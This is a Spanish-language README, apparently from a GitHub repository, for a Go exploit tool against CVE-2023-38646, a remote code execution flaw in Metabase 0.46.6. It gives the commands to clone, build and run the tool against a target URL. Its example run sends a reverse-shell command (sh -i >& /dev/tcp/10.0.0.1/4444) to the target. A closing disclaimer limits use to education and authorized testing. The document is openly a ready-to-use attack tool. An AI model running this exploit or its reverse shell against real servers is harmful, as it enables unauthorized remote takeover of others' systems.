
Exploit para CVE-2023-38646 en Metabase 0.46.6, que permite la ejecución remota de código mediante solicitudes manipuladas y la recuperación del token de configuración.
Exploit para CVE-2023-38646 Metabase 0.46.6
Esta herramienta explota una vulnerabilidad (CVE-2023-38646) en una plataforma de software. El exploit permite la ejecución remota de código mediante una solicitud manipulada, aprovechando una cadena de conexión de base de datos manejada incorrectamente.
La herramienta:
Clona el repositorio:
git clone https://github.com/SUT0L/CVE-2023-38646.git
cd CVE-2023-38646
go build -o exploit
chmod +x exploit
./exploit --url [TARGET_URL] --command [COMMAND] [--proxy PROXY_URL]
TARGET_URL: La URL de la plataforma que se va a escanear y explotar. COMMAND: El comando que se ejecutará en el objetivo. PROXY_URL (Opcional): La URL del servidor proxy (por ejemplo, http://127.0.0.1:8080). Si no se proporciona, no se utilizará ningún proxy.
./exploit --url https://example.com --command 'sh -i >& /dev/tcp/10.0.0.1/4444 0>&1' --proxy http://127.0.0.1:8080
Esta herramienta está destinada únicamente a fines educativos y de investigación. Asegúrate siempre de tener la autorización adecuada antes de escanear o explotar cualquier objetivo. El uso indebido de esta herramienta va estrictamente en contra de la intención del desarrollador y podría ser ilegal.
No dudes en abrir issues para cualquier comentario, error o solicitud de funciones. ¡Las pull requests siempre son bienvenidas!